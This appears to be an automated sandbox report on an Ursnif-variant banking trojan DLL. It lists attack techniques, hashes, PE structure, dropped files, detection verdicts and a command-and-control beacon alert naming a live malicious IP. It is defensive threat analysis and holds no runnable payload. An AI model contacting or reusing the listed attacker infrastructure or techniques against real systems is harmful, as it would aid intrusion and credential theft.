Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | 813 Process Injection | 1 Masquerading | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Input Capture | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Valid Accounts | NTDS | 25 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 11 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Access Token Manipulation | LSA Secrets | 1 Query Registry | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 31 Virtualization/Sandbox Evasion | Cached Domain Credentials | 11 Security Software Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | 813 Process Injection | DCSync | 31 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Rundll32 | Proc Filesystem | 3 Process Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction | |
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 1 System Owner/User Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | ||
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | 11 Remote System Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop | ||
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rename System Utilities | Keylogging | 1 System Network Configuration Discovery | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Joe Sandbox ML |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | HEUR/AGEN.1245293 | Download File |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe |
⊘No contacted domains info
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
true |
| unknown | |
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| low | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
94.140.115.8 | unknown | Latvia | 43513 | NANO-ASLV | true |
IP |
---|
192.168.2.1 |
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 617384 |
Start date and time: 28/04/202215:46:16 | 2022-04-28 15:46:16 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 11m 3s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | 626a983c091a8.tiff.dll |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 38 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 2 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.bank.troj.evad.winDLL@24/17@0/2 |
EGA Information: |
|
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
- Excluded IPs from analysis (whitelisted): 13.107.42.16
- Excluded domains from analysis (whitelisted): fs.microsoft.com, config.edge.skype.com.trafficmanager.net, arc.msn.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, l-0007.l-msedge.net, config.edge.skype.com
- Execution Graph export aborted for target mshta.exe, PID 6312 because there are no executed function
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description |
---|---|---|
15:47:26 | API Interceptor | |
15:48:03 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
94.140.115.8 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse |
⊘No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
NANO-ASLV | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
⊘No context
⊘No context
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 11606 |
Entropy (8bit): | 4.8910535897909355 |
Encrypted: | false |
SSDEEP: | 192:P9smn3YrKkkdcU6ChVsm5emlz9smyib4T4YVsm5emdYxoeRKp54ib49VFn3eGOVJ:dMib4T4YLiib49VoGIpN6KQkj2rIkjhQ |
MD5: | F84F6C99316F038F964F3A6DB900038F |
SHA1: | C9AA38EC8188B1C2818DBC0D9D0A04085285E4F1 |
SHA-256: | F5C3C45DF33298895A61B83FC6E79E12A767A2AE4E06B43C44C93CE18431793E |
SHA-512: | E5B80F0D754779E6445A14B8D4BA29DD6D0060CD3DA6AFD00416DDC113223DB48900F970F9998B2ABDADA423FBA4F11E9859ABB4E6DBA7FE9550E7D1D0566F31 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1328 |
Entropy (8bit): | 3.995664612989827 |
Encrypted: | false |
SSDEEP: | 24:HM2je9E2+fQIDfHlQhKdNWI+ycuZhNeqakSpbPNnq9qd:/QGFyKd41uleqa3pRq9K |
MD5: | 6587DEF66392DAB6B08BF59A1C8F335D |
SHA1: | D3BDF1132EB91B84F76740631C5FB05E1EC06E00 |
SHA-256: | 1538AF45B6819C8771B587E453588ABFE4F027FE368051BEE4FE1757BF7D6007 |
SHA-512: | E598F1A700D83B9E66F1993D69390C9D13A1F0FAB1847AA7B0F5C22C21C745A2453B9D8CB3CFA724F1D812F82CD8D0765940F50177FF923D27C53FE238EC7D5E |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1328 |
Entropy (8bit): | 3.9710842422597117 |
Encrypted: | false |
SSDEEP: | 24:HMje9EuZfAt+ov4DfHnhKdNWI+ycuZhNYakS0PNnq9qd:fBALuBKd41ulYa3Uq9K |
MD5: | 6A48F7D6DEFC4A58B553495102391375 |
SHA1: | CE2F027ACDF13CD5A8A3831EC5C08A83E7005E97 |
SHA-256: | 46848DC2C4440B7CC5D30DF42845016CC7008B768ED61F96A89D551800EBFB57 |
SHA-512: | C20E075B4C315F9F79620DE140CAA700BC47149D13348022D6A90492BCFC2B29A5DF135C2BBCAFB00D412D6CE12FD2A8E9FE29173EC5A571CA234A4AAB6851B2 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.106144324425024 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryqXqak7YnqqZXbPN5Dlq5J:+RI+ycuZhNeqakSpbPNnqX |
MD5: | 0CA3AAF1332141EC31A3082F63FCC223 |
SHA1: | 275094865A6819117E9F912250B4678A7E47CBE1 |
SHA-256: | CF1FEF2B2110B06F3E111F93F7C643785D63E3A26635FFA5A025860EC71C529D |
SHA-512: | 7179731F0F2A12E574C9111AE7FC048DA21AE1310DC94D8820AAA8ED09D70858A07879F3635A04240B703D1D53DCBE00400EC55907C400B814F385E179116EFD |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 403 |
Entropy (8bit): | 5.058106976759534 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y |
MD5: | 99BD08BC1F0AEA085539BBC7D61FA79D |
SHA1: | F2CA39B111C367D147609FCD6C811837BE2CE9F3 |
SHA-256: | 8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9 |
SHA-512: | E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 369 |
Entropy (8bit): | 5.228628350308548 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fDQiGdGqzxs7+AEszIwkn23fDQiGdGP:p37Lvkmb6KRfkNWZEifko |
MD5: | 0D4B64639A192247DF402E019930BB67 |
SHA1: | CA1AF61AC898895AC43D1A7CBE6B19EEB309F2D1 |
SHA-256: | 15A70E1E3F2D41533C027174C48ADE604221D1FF09076828E0E094A2B2AAB8ED |
SHA-512: | D4E6EF9C54DCD84BA4B58DD5C5B1E827421B1B572794290A2D96052574D4949761950CE3A8560715B8334A30C7FF36BE518A7FDA14610393007E1D6181C820CF |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.6167081012196842 |
Encrypted: | false |
SSDEEP: | 24:etGSG8OmU0t3lm85xWAseO4z8Q64pfUPtkZfPx0xSz3VUWI+ycuZhNeqakSpbPNq:6gXQ3r5xNOzQfUuJJ0xc31uleqa3pRq |
MD5: | A1D5C3054EA8FFA5550A29CE9E6F74F9 |
SHA1: | 733D9BE957632F61B0E6E16A7CBC56F4515DD03F |
SHA-256: | 5609E8BDF9FEA420BD27DFC2199324182BF52C8E57B036B4C1744CE82DE9A87D |
SHA-512: | 5642AED56E506AA6373CEFB8AC41C6A7D7E642E9011A547A54348445D5EEA69BED2EFC0B313F06362AC30794D93EC544AFECEFE3CB2E9BD3953930D0F8CCCEE9 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 866 |
Entropy (8bit): | 5.318127705611573 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KRf7EifmKaM5DqBVKVrdFAMBJTH:Akka6C7EumKxDcVKdBJj |
MD5: | 9220957F6304D18EBE11EEB2E498901F |
SHA1: | 4AFE215A0ABFE86D27724AD19C757562E85BD206 |
SHA-256: | 7A8B3042CDBAAF872FAD5B137DBD4C29526E2B5D26EC23ADE382C5CBF0F2D9D0 |
SHA-512: | C242A94B75DB54809816DDE407132F730CF5EC42D196C4DD5F882AE38FA3D1E63239C276094110AF5FA7F3F47BBBAA1D674115D36C298C88504CB56FA0D4F735 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.070250175986324 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryWak7Ynqq0PN5Dlq5J:+RI+ycuZhNYakS0PNnqX |
MD5: | 7A75DA598ED96E390E25DC6D02BDCD7B |
SHA1: | 59A35E35426D7A769C59273042375DE1A3DB1CEA |
SHA-256: | B4C0AE1F1CA5E0AE438B82750A560A9B4B2B2A6629B91AFF268515EBB9D006AE |
SHA-512: | 25C938C2B4458FEAEF3B915AF37A4003A3CA8B8CF1FF91B2B8650DB1AA2D99218C2AEF30B1BC6381DE4065390D60997C020F75BB838AA2EDD744B6FB748D3C5B |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 392 |
Entropy (8bit): | 4.988829579018284 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy |
MD5: | 80545CB568082AB66554E902D9291782 |
SHA1: | D013E59DC494D017F0E790D63CEB397583DCB36B |
SHA-256: | E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C |
SHA-512: | C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 369 |
Entropy (8bit): | 5.178508652415704 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fMJT9zxs7+AEszIwkn23fMJTY:p37Lvkmb6KRfAT9WZEifATY |
MD5: | 2AC07CA087D2B630DDE7F8CA8C735F5E |
SHA1: | 73CAEF5C78A7EA6A779521DDB938AA4C7C67CFF8 |
SHA-256: | AD71536ED4CC55973C9DE915BC6C784B036CD0BC31FDC72BC19891535A0CE208 |
SHA-512: | 9FFECE26A01583FA5922538757FB3EBCDCC277F41E275DBB0CB4E53A93C2F01CBFE966F397164A2B07C813A48C5E50B2016EC69E98F54A27E16ACA1DBDEF7D2C |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.592678879252231 |
Encrypted: | false |
SSDEEP: | 24:etGS3/u2Bg85z7xlfwZD6SgdWqtkZfSwzWI+ycuZhNYakS0PNnq:6GYb5hFCD6TWdJSZ1ulYa3Uq |
MD5: | 56BB941B344F5E00BD719C3B50396B06 |
SHA1: | BCEDEEBAC6120B395E3CF217828EE9DD8BA8E8CE |
SHA-256: | 767A6177DB9E00E45FD811D64F595B0D8D816AD6EAC42B46A791E0CB0B17FA95 |
SHA-512: | C8ED28D50EFED53C2B04BFD3DFDFFB77CBE86005728C9E5575A5912CBA4A041C64EBB3410B227F4982C4820328242A54B7382FF73627D21F01C6B460F4980690 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 866 |
Entropy (8bit): | 5.301947942506882 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KRfATSEifATNKaM5DqBVKVrdFAMBJTH:Akka6CATSEuATNKxDcVKdBJj |
MD5: | DDC54E3FAE36E0AA75B36EA5C85F4098 |
SHA1: | A1F1DFF87060524E1C350141B9DE22F2D3067AB5 |
SHA-256: | EBD48312C734BDFAA4F92726959CF518F1A7D12D31041693AD66109C99BAB7ED |
SHA-512: | E0B337A41A8FC17C9458BCBF0860CE75D189025DDBF16952180A82D0868148B61A016CF149D4F3F44D8F763156F627459787461C8CDB3A577274FBF66575782F |
Malicious: | false |
Preview: |
Process: | C:\Windows\explorer.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 218 |
Entropy (8bit): | 5.411852919034256 |
Encrypted: | false |
SSDEEP: | 6:QHXv1sr3gK1C+LgyKBM34H6dNH83F1tu4r9iyeqmM:Q39sTN13LgyaI4HscA4cyeHM |
MD5: | 965E42B72C6150D487D2F6487DF81B2D |
SHA1: | A0C711D3725E07226527E96B9B939FAD97C9A20D |
SHA-256: | 625461A15B47DFC81DBD5EDD7004771F0F23069047F866189D817EFC7DB8BAA0 |
SHA-512: | 19CBF9CBA5F1888510D5C9A24A3C75FF2B5B2323E94CD034D57399D8C676CE2957E56914862BAA79AD0E6B4EA4BE8E0206048A02C4BB64F5F987C32ACDA62AE6 |
Malicious: | false |
Preview: |
Process: | C:\Windows\explorer.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 838 |
Entropy (8bit): | 3.073236880282747 |
Encrypted: | false |
SSDEEP: | 12:8glVm/3BVSXvk44X3ojsqzKtnWNaVgiNL4t2Y+xIBjK:8p/BHYVKVWiV57aB |
MD5: | CA1C201059C5BFD5900F5EB2466883CC |
SHA1: | BF3670A8C06A4FABC5C410F368E178B353F9166C |
SHA-256: | E5717E89B0D46C5E89F39410FA7A9DE94AA6A3301F8AC920F84F1A7179554085 |
SHA-512: | 2273AF46D41B9698B23AEADD8EFBEF80017CFD465B4347CFB99C2FEAE371F39A511288AA64AAFA2E35DD2AD883D8E43D70A65E62C18977C6C6D85E3153041D4C |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 6.102098470589205 |
TrID: |
|
File name: | 626a983c091a8.tiff.dll |
File size: | 618496 |
MD5: | 388aa15c4d1a96534e7ca5587942fa0a |
SHA1: | a88e07643c07c8f75845c82c19cd928355d441b2 |
SHA256: | abc6dfca9ad106cf41da3b6309a15e2a761991d2fad41662211b1afb1c2b0973 |
SHA512: | c21861d1e8a81159e615431afa9c6da74d92aeb13f9471e3d8af2bdc979f8be85ed2eb7ef3835fe86812fdb5955d6351ca8dbd7d6c164007bc9c41fb09266f56 |
SSDEEP: | 6144:eBbkmU1vOuplJ9dX8vxxaYuQ1n79lmdrjhXccbwD1Yl/R0odd6MbBCKaD3abuFGs:iUJVpX9cgQ1n7DQjbES/OodJ+sS |
TLSH: | 7FD4E029C7601A6AD81537791899803F0A39F578E32F70EF26847D6FB50A6F05A34F39 |
File Content Preview: | MZ......................@...................................,...........!..L.!This program cannot be run in DOS mode....$........I.R.(n..(n..(n......(n..z...(n..P...(n.fLj..(n..vl..(n..z...(n..P...(n.._...(n..z...(n..z...(n......(n.fLk..(n..z...(n..z...(n |
Icon Hash: | 9068eccc64f6e2ad |
Entrypoint: | 0x401023 |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
DLL Characteristics: | TERMINAL_SERVER_AWARE |
Time Stamp: | 0x411096D1 [Wed Aug 4 07:57:05 2004 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 0 |
File Version Major: | 5 |
File Version Minor: | 0 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 0 |
Import Hash: | de44747c447d17324a209c20a63c5698 |
Instruction |
---|
jmp 00007F848CE02CCDh |
jmp 00007F848CE33348h |
jmp 00007F848CE02A43h |
jmp 00007F848CE0281Eh |
jmp 00007F848CE02AC9h |
jmp 00007F848CE026A4h |
jmp 00007F848CE3888Fh |
jmp 00007F848CE027CAh |
jmp 00007F848CE2BCF5h |
jmp 00007F848CE3BB30h |
jmp 00007F848CE3774Bh |
jmp 00007F848CE3CC36h |
jmp 00007F848CE02751h |
jmp 00007F848CE2CE8Ch |
jmp 00007F848CE3F3B7h |
jmp 00007F848CE366A2h |
jmp 00007F848CE2DEDDh |
jmp 00007F848CE414F8h |
jmp 00007F848CE028D3h |
jmp 00007F848CE3E05Eh |
jmp 00007F848CE34529h |
jmp 00007F848CE2EEF4h |
jmp 00007F848CE3DC8Fh |
jmp 00007F848CE02A2Ah |
jmp 00007F848CE39935h |
jmp 00007F848CE31240h |
jmp 00007F848CE4148Bh |
jmp 00007F848CE30106h |
jmp 00007F848CE02A21h |
jmp 00007F848CE0272Ch |
jmp 00007F848CE3AA67h |
jmp 00007F848CE403D2h |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8a000 | 0xa0 | .idata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8b000 | 0xc100 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x98000 | 0x1010 | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x40000 | 0x38 | .rdata |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8a2ac | 0x20c | .idata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x1000 | 0x1 | .text |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x3efe0 | 0x3f000 | False | 0.375895182292 | data | 4.45975589538 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
.rdata | 0x40000 | 0x3fb5f | 0x40000 | False | 0.815296173096 | data | 7.22910177016 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0x80000 | 0x9537 | 0x7000 | False | 0.3271484375 | data | 5.47009773382 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.idata | 0x8a000 | 0x98d | 0x1000 | False | 0.2060546875 | data | 2.48883672307 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.rsrc | 0x8b000 | 0xc100 | 0xd000 | False | 0.465106670673 | data | 5.38059585556 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0x98000 | 0x17d7 | 0x2000 | False | 0.237915039062 | data | 3.90488138375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country |
---|---|---|---|---|---|
RT_BITMAP | 0x8b510 | 0x666 | data | English | United States |
RT_ICON | 0x8bb78 | 0x485d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States |
RT_ICON | 0x903d8 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544 | English | United States |
RT_ICON | 0x92980 | 0xea8 | data | English | United States |
RT_ICON | 0x93828 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States |
RT_ICON | 0x940d0 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States |
RT_DIALOG | 0x94638 | 0xb4 | data | English | United States |
RT_DIALOG | 0x946f0 | 0x120 | data | English | United States |
RT_DIALOG | 0x94810 | 0x158 | data | English | United States |
RT_DIALOG | 0x94968 | 0x202 | data | English | United States |
RT_DIALOG | 0x94b70 | 0xf8 | data | English | United States |
RT_DIALOG | 0x94c68 | 0xa0 | data | English | United States |
RT_DIALOG | 0x94d08 | 0xee | data | English | United States |
RT_GROUP_ICON | 0x94df8 | 0x4c | data | English | United States |
RT_VERSION | 0x94e48 | 0x290 | MS Windows COFF PA-RISC object file | English | United States |
DLL | Import |
---|---|
msvcrt.dll | fgetwc, strcoll, srand |
GDI32.dll | GetBkColor, ExtSelectClipRgn, GetTextMetricsW, GetCharWidthFloatA, GetCharWidth32A, GetTextCharacterExtra, GetCharWidthA, GdiComment |
KERNEL32.dll | GetStringTypeA, WriteProcessMemory, GetCommTimeouts, GetConsoleCP, EnumResourceTypesA, GlobalFlags, GetFileTime, GetThreadLocale, LocalHandle, GetLargestConsoleWindowSize, EraseTape, GetDiskFreeSpaceExA, lstrlenA, GlobalMemoryStatus, GetModuleFileNameA, GetBinaryTypeA, DebugBreak |
ADVAPI32.dll | RegGetValueA, GetFileSecurityA, EnumServicesStatusExW, InitiateSystemShutdownExW |
mscms.dll | GetColorDirectoryW |
USER32.dll | GetClientRect, GetClassNameA, GetPropW, GetScrollBarInfo, DeleteMenu, MessageBoxIndirectW, GetMenuItemRect, GetMessagePos, DefMDIChildProcW, GetUpdateRgn, LoadMenuA, GetQueueStatus, GetMessageW |
OLEAUT32.dll | LoadTypeLibEx, GetRecordInfoFromTypeInfo |
Description | Data |
---|---|
LegalCopyright | A Company. All rights reserved. |
InternalName | |
FileVersion | 1.0.0.0 |
CompanyName | A Company |
ProductName | |
ProductVersion | 1.0.0.0 |
FileDescription | |
OriginalFilename | myfile.exe |
Translation | 0x0409 0x04b0 |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
04/28/22-15:47:50.266267 04/28/22-15:47:50.266267 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
